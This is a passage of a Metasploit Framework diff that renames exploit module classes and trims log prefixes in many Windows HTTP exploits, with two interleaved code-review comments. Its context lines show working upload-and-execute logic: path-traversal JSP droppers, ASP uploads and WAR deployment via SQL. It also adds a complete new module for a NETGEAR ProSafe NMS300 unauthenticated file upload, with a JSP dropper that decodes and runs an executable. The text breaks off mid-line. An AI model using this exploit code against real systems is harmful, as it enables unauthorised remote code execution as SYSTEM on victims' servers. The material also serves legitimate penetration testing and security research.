'CVE-pending', 'stream.raw') + file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw') f = File.new(file, 'rb') stream = Rex::Java::Serialization::Model::Stream.decode(f) diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 61734310a5..9b3c96e2e8 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } 
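Review bot: In the `@@ -181,7` hunk of hp_sitescope_dns_tool.rb the handle from `File.new(file, 'rb')` is passed to `Stream.decode` with no close in view, so a decode error would leave it open unless an `ensure` exists below the hunk. The block form closes it on every path: `stream = File.open(file, 'rb') { |f| Rex::Java::Serialization::Model::Stream.decode(f) }`. The hunk also renames the data directory to `R7_2015_17`, so `stream.raw` has to move with it in the same commit, which is not visible here. The method continues outside the hunk.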
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index d6802c853e..db7349f2b9 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -19,7 +19,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] } diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index bb0bf66cdc..3c6c307d55 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index d20b2d65ea..858761d5b2 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 7ce4a44b51..20350f46d3 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index fba7ae256a..5fc1f2e280 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index b7e738d5b4..02a2577049 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index eab3afafdd..f8d661fd61 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1b8962d096..7fa35f9262 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb 
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 6cec7edfd1..5015245f56 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] } diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 936bfb0e44..ef301edbab 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index c5ce138480..f77b24d91c 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index de50318045..3d9068f693 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb 
+++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -110,20 +110,20 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") return true else - print_error("#{peer} - Upload failed...") + print_error("Upload failed...") return false end end def upload_and_run_jsp(filename, contents) - print_status("#{peer} - Getting a valid CSRF token...") + print_status("Getting a valid CSRF token...") csrf_token = get_upload_token fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? - print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + print_status("Exploiting traversal to upload JSP dropper...") upload_file(filename, contents, csrf_token) - print_status("#{peer} - Executing the dropper...") + print_status("Executing the dropper...") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, filename), @@ -150,15 +150,15 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating EXE...") + print_status("Generating EXE...") exe = payload.encoded_exe @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" - print_status("#{peer} - Generating JSP dropper...") + print_status("Generating JSP dropper...") dropper = jsp_drop_and_execute(exe, @exe_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading and running JSP dropper...") + print_status("Uploading and running JSP dropper...") upload_and_run_jsp(dropper_filename, dropper) end diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 00748d0456..4fa901af14 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb 
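Review bot: In the `@@ -110,20` hunk of jira_collector_traversal.rb, `upload_file` returns `true` or `false`, but `upload_and_run_jsp` calls it as a bare statement and goes on to request the dropper even after `"Upload failed..."` has been printed. Checking the result, for example `return unless upload_file(filename, contents, csrf_token)`, stops the run at the first failure and avoids a follow-up request that cannot succeed. `upload_file` begins before the hunk and `upload_and_run_jsp` ends after it.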
+++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path}...") + print_status("Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) - print_status("#{peer} - Executing payload #{asp_name}") + print_status("Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 2839baa385..8037a95ec3 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("SystemTab", "uploadImage.asp") 
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}") data = post_data.to_s - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab", "uploadImage.asp"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@payload_name) - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index afd75aa97d..e0b5dc2d8d 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] } diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index abe6834898..9dac1e3d1a 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx" - print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") + print_status("Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") + print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" - print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") + print_status("Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 
@@ -162,10 +162,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") + print_error("Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 44441df158..367e93543a 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" - print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + print_status("Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end 
@@ -86,25 +86,25 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" - print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + print_status("Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload_name, 3) end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 83fd3da795..0d0fd3e481 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /MailEnable/ ] } diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 14391ebab3..f707b34c05 100644 
--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine OpManager") + vprint_status("Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), @@ -109,14 +109,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 - print_status("#{peer} - Retrieved API key [ #{api_key} ]") + print_status("Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end 
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index e017dd250a..ebbada86aa 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index e69b65abee..2cd98114c1 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 1764bf01ea..f9e6f01222 100644 
--- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 4488698868..5f6da07f06 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 5a33167929..42d991ab2d 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 3f17071de0..f6ae402ff7 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index f02594d536..ffdcf97b1d 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb 
+++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 23aa9083fa..eb5fc32a50 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /MiniWeb/ ] } @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload(filename, filedata) - print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'") + print_status("Trying to upload '#{::File.basename(filename)}'") uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}") depth = "../" * (datastore['DEPTH'] + rand(10)) @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote # upload exe exe_name = "WINDOWS/system32/#{fname}.exe" exe = generate_payload_exe - print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)") + print_status("Sending executable (#{exe.length.to_s} bytes)") upload(exe_name, exe) # upload mof mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)") + print_status("Sending MOF (#{mof.length.to_s} bytes)") upload(mof_name, mof) # list files to clean up diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d9c46a3d2a..4298f850fb 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /InterVations/ ] } diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index b897f791b1..7d9bfc54af 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb new file mode 100644 index 0000000000..8e00ad258d --- /dev/null +++ b/modules/exploits/windows/http/netgear_nms_rce.rb 
@@ -0,0 +1,143 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', + 'Description' => %q{ + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file upload vulnerability that can be exploited by an + unauthenticated remote attacker to execute code as the SYSTEM user. + Two servlets are vulnerable, FileUploadController (located at + /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). + This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and + 1.1.0.13. + }, + 'Author' => + [ + 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-1525'], + ['US-CERT-VU', '777024'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] + ], + 'DefaultOptions' => { 'WfsDelay' => 5 }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Privileged' => true, + 'Targets' => + [ + [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 4 2016')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, "Application path", '/']) + ], self.class) + end + + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'GET' + }) + if res && res.code == 405 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + 
end + end + + + def generate_jsp_payload + exe = generate_payload_exe + base64_exe = Rex::Text.encode_base64(exe) + payload_name = rand_text_alpha(rand(6)+3) + + var_raw = 'a' + rand_text_alpha(rand(8) + 3) + var_ostream = 'b' + rand_text_alpha(rand(8) + 3) + var_buf = 'c' + rand_text_alpha(rand(8) + 3) + var_decoder = 'd' + rand_text_alpha(rand(8) + 3) + var_tmp = 'e' + rand_text_alpha(rand(8) + 3) + var_path = 'f' + rand_text_alpha(rand(8) + 3) + var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + <% + try { + String #{var_buf} = "#{base64_exe}"; + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + + File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); + + BufferedOutputStream #{var_ostream} = + new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + } catch (Exception e) { + } + %> + | + + jsp.gsub!(/[\n\t\r]/, '') + + return jsp + end + + + def exploit + jsp_payload = generate_jsp_payload + + jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) + jsp_full_name = "null#{jsp_name}.jsp" + post_data = Rex::MIME::Message.new + post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') + post_data.add_part(jsp_payload, + "application/octet-stream", 'binary', + "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") + data = post_data.to_s + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + if res && res.code == 200 && res.body.to_s =~ /{"success":true, 
